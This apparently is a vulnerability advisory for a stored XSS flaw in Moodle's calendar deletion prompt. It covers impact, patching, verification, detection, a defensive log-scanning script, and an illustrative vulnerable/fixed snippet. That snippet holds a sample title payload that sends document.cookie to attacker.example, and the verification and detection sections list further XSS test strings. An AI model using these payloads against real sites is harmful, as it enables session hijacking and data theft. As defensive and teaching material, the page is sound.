CVE-2024-38274
📋 TL;DR
A stored cross-site scripting (XSS) flaw in Moodle's calendar: the title of a calendar event is not sufficiently sanitized before it is rendered in the event deletion prompt, so script injected into a title executes in the browser of any user who opens the deletion prompt for that event. It affects users of unpatched Moodle sites, and a successful attack runs attacker JavaScript in the victim's authenticated session, with the session and any data the victim can see at risk.
💻 Affected Systems
- Moodle (upstream releases prior to the fix named in the vendor advisory, and the Fedora moodle package)
📦 What is this software?
Fedora by Fedoraproject
Moodle by Moodle
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as the authenticated victim (including an administrator, if one opens the prompt), redirect the victim to malicious sites, or use the victim's browser as a foothold for further attacks such as phishing pages or drive-by download links. XSS by itself does not install software on the user's machine; it runs in the page's origin.
Likely Case
Session hijacking, credential theft, or unauthorized actions within the application context.
If Mitigated
Reduced impact if a strict Content Security Policy blocks inline script and session cookies are HttpOnly; input validation on titles adds defence in depth. Note that encoding the title at the point of output is the actual fix, not a mitigation.
🎯 Exploit Status
Exploitation requires the ability to create or edit a calendar event, which in Moodle is typically available to any authenticated user for their own user-level events and to teachers or managers for course and site events. The payload is an ordinary stored-XSS string in the title; the victim is whoever opens the deletion prompt for that event, so the practical attack path is an event placed where a higher-privileged user (for example an administrator cleaning up a course or site calendar) will delete it. This page references no public exploit.
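The bug class behind this advisory, shown as an added illustration written for this page rather than Moodle's own code: a deletion prompt whose body is assembled as an HTML string from the event title, beside the output-encoded fix and a DOM-based variant that needs no encoding step at all. The function names, the sample title and the assumption that the prompt is built from a string are invented for the example; Moodle's real prompt is built by its own modal code, not by these functions.

```javascript
// Added illustrative example for this page (not Moodle's code). Shows the
// stored-XSS pattern behind a "delete event?" prompt and two fixes.
// Assumption: the prompt body is built from the attacker-controlled event
// title. All names below are invented.

// Constructed attacker-supplied title. src=x fails to load, so the
// onerror handler runs as soon as the element is inserted into a page.
const MALICIOUS_TITLE =
  'Exam <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable: raw title concatenated into markup that the UI then
// assigns via innerHTML (or hands to a templating call marked "safe").
function buildDeletePromptUnsafe(title) {
  return `<p>Are you sure you want to delete the event "${title}"?</p>`;
}

// HTML-encode the characters that matter in text and quoted-attribute
// contexts. Encoding happens at output, in the context where data lands.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same prompt, title shown verbatim to the user but inert.
function buildDeletePromptSafe(title) {
  return `<p>Are you sure you want to delete the event "${escapeHtml(title)}"?</p>`;
}

// Preferable where a DOM exists: never build markup from data at all, so
// there is no encoding step to forget. Returns null under Node so the
// file still runs stand-alone.
function buildDeletePromptDom(title) {
  if (typeof document === 'undefined') return null;
  const p = document.createElement('p');
  p.textContent = `Are you sure you want to delete the event "${title}"?`;
  return p;
}

// Quick self-check: apart from the fixed <p> wrapper, does the prompt
// still contain a raw tag opener? True means live markup survived.
function promptHasRawTag(html) {
  const inner = html.replace(/^<p>/, '').replace(/<\/p>$/, '');
  return /<[a-zA-Z!\/]/.test(inner);
}

console.log('unsafe:', buildDeletePromptUnsafe(MALICIOUS_TITLE));
console.log('safe:  ', buildDeletePromptSafe(MALICIOUS_TITLE));
```

The unsafe variant emits the `<img ... onerror=...>` tag intact; the safe variant emits `&lt;img ... onerror=&quot;...` so the title is displayed as text. Encoding must match the context (HTML text here; a title landing inside an attribute or a JavaScript string needs that context's encoding), which is why the `textContent` approach is the one to prefer in browser code.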
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Fixed upstream in the Moodle releases listed in the vendor advisory below; on Fedora, the fix ships in the moodle package versions named in the two Fedora package-announce messages under References.
Vendor Advisory: https://moodle.org/mod/forum/discuss.php?d=459499
Restart Required: No
Instructions:
1. Update Moodle to a patched release (from the vendor advisory) or, on Fedora, apply the security update with 'sudo dnf update moodle'.
2. Complete the Moodle upgrade step so the new code is active: visit Site administration > Notifications, or run 'php admin/cli/upgrade.php' from the Moodle directory.
3. Verify the fix by repeating the calendar event deletion prompt test described under "How to Verify".
🔧 Temporary Workarounds
Input Validation Enhancement
Implement strict input validation for calendar event titles to reject or sanitize HTML and script content. This is defence in depth only: the fix is encoding the title where it is rendered, and validation that merely blocks the string "<script>" is bypassed by other tags and event handlers.
Content Security Policy (CSP)
Deploy a strict CSP to limit what injected script can do by restricting script execution sources. Moodle pages rely on inline JavaScript in places, so a policy strict enough to block inline payloads (no 'unsafe-inline' in script-src) must be tested against the site before rollout.
🧯 If You Can't Patch
- Disable calendar event creation/modification for untrusted users.
- Implement web application firewall (WAF) rules to block XSS payloads in event titles. Treat this as a speed bump, not a fix: encoded or obfuscated payloads routinely evade signature rules.
🔍 How to Verify
Check if Vulnerable:
On a staging site with a dedicated test account, create a calendar event whose title carries a harmless payload and then open the deletion prompt for it. Test with an event-handler payload such as <img src=x onerror=alert('test')> as well as <script>alert('test')</script>: browsers do not run <script> elements that are inserted via innerHTML, so a script-tag test alone can report "safe" when the prompt is still injectable. If an alert fires, the site is vulnerable.
Check Version:
On Fedora: 'rpm -q moodle'. In Moodle: Site administration > Notifications shows the running release, as does $release in version.php under the Moodle web root. Compare against the fixed releases in the vendor advisory.
Verify Fix Applied:
After patching, repeat the test; the payload should appear in the prompt as literal text (visible "<" characters) and nothing should execute.
📡 Detection & Monitoring
Log Indicators:
- Unusual calendar event creations/modifications with script-like content in titles.
Network Indicators:
- HTTP requests to calendar endpoints whose title or name parameter contains script tags, event handlers (onerror=, onload=) or javascript: URIs, including URL-encoded forms such as %3Cscript%3E and double-encoded forms such as %253C.
SIEM Query:
Pseudo-syntax to adapt to your SIEM; decode URL-encoding before matching, and note that stock web-server access logs do not record POST bodies, so the title parameter is only visible if a reverse proxy or WAF logs request bodies:
source="web_logs" AND (uri_path="/calendar/" OR uri_path="/event/") AND (param="title" CONTAINS "<script>" OR param="title" CONTAINS "javascript:" OR param="title" CONTAINS "onerror=")
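The log and network indicators above, run offline over constructed log lines, as an added example written for this page (not Moodle's, Fedora's or any SIEM vendor's code). It assumes a reverse proxy or WAF that appends the form-encoded request body to each access-log line as a final quoted field, since stock web-server logs do not record POST bodies; the sample lines, the /calendar/ path pattern and the watched parameter names ("name", Moodle's event form field, and "title", used by the query above) are assumptions for illustration.

```javascript
// Added example (not Moodle's or Fedora's code): scan log lines for
// script-like calendar event titles. Assumed, constructed log format:
// Apache combined log with the form-encoded request body appended as a
// final quoted field (a reverse proxy or WAF can be configured to emit
// this; stock access logs carry no POST body).

const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+ "([^"]*)"$/;

// Endpoints and parameter names to watch (assumed for this example).
const CALENDAR_PATH_RE = /^\/calendar\//;
const WATCHED_PARAMS = new Set(['name', 'title']);

// Script-ish content: tags that can carry handlers or scripts, javascript:
// URIs, and inline event handlers. Tune to your own false-positive rate.
const XSS_INDICATORS = [
  { name: 'script-capable tag', re: /<\s*(script|img|svg|iframe|object|embed|a|body|style)\b/i },
  { name: 'javascript: URI', re: /javascript\s*:/i },
  { name: 'inline event handler', re: /\bon[a-z]+\s*=/i },
];

// Decode percent- and plus-encoding repeatedly so double-encoded payloads
// (%253C -> %3C -> <) are caught. Stops when another pass changes nothing
// or the input is malformed.
function decodeFully(s, rounds = 3) {
  let cur = s;
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Split a query string or form body into decoded [key, value] pairs.
// Split on the raw (encoded) form first so encoded '&' and '=' stay in values.
function parseForm(encoded) {
  const out = [];
  for (const pair of encoded.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const k = eq < 0 ? pair : pair.slice(0, eq);
    const v = eq < 0 ? '' : pair.slice(eq + 1);
    out.push([decodeFully(k), decodeFully(v)]);
  }
  return out;
}

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, url, status, body] = m;
  const q = url.indexOf('?');
  return {
    ip, time, method, status,
    path: q < 0 ? url : url.slice(0, q),
    params: [...parseForm(q < 0 ? '' : url.slice(q + 1)), ...parseForm(body)],
  };
}

// One finding per watched parameter on a calendar path that trips an indicator.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req || !CALENDAR_PATH_RE.test(req.path)) continue;
    for (const [k, v] of req.params) {
      if (!WATCHED_PARAMS.has(k)) continue;
      const reasons = XSS_INDICATORS.filter((ind) => ind.re.test(v)).map((ind) => ind.name);
      if (reasons.length) findings.push({ ip: req.ip, time: req.time, path: req.path, param: k, value: v, reasons });
    }
  }
  return findings;
}

// Constructed sample log (not real traffic): one benign event, a plain
// <script> title, a double-encoded onerror payload, a javascript: link,
// and a script-looking forum post that the path filter should ignore.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jul/2024:09:12:01 +0000] "POST /calendar/event.php?action=new HTTP/1.1" 303 0 "name=Weekly+meeting&description=Room+101"',
  '10.0.0.9 - - [01/Jul/2024:09:13:44 +0000] "POST /calendar/event.php?action=new HTTP/1.1" 303 0 "name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"',
  '10.0.0.9 - - [01/Jul/2024:09:14:02 +0000] "POST /calendar/event.php?action=edit&id=42 HTTP/1.1" 303 0 "name=Exam%2520%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"',
  '10.0.0.9 - - [01/Jul/2024:09:15:10 +0000] "POST /calendar/event.php?action=new HTTP/1.1" 303 0 "name=%3Ca+href%3D%22javascript%3Aalert(1)%22%3Eclick%3C%2Fa%3E"',
  '10.0.0.9 - - [01/Jul/2024:09:16:00 +0000] "POST /mod/forum/post.php HTTP/1.1" 303 0 "subject=%3Cscript%3E"',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanLog(SAMPLE_LOG)) {
    console.log(`${f.time} ${f.ip} ${f.path} ${f.param}=${JSON.stringify(f.value)} [${f.reasons.join(', ')}]`);
  }
}
```

Run with node; three of the five constructed lines are reported. The repeated decoding in decodeFully is what catches the double-encoded third line, which a single-pass CONTAINS "<script>" match would miss entirely, and the javascript: and event-handler indicators catch payloads that contain no <script> tag at all.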
🔗 References
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F7AZYR7EXV6E5SQE2GYTNQE3NOENJCQ6/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GHTIX55J4Q4LEOMLNEA4OZSWVEENQX7E/
- https://moodle.org/mod/forum/discuss.php?d=459499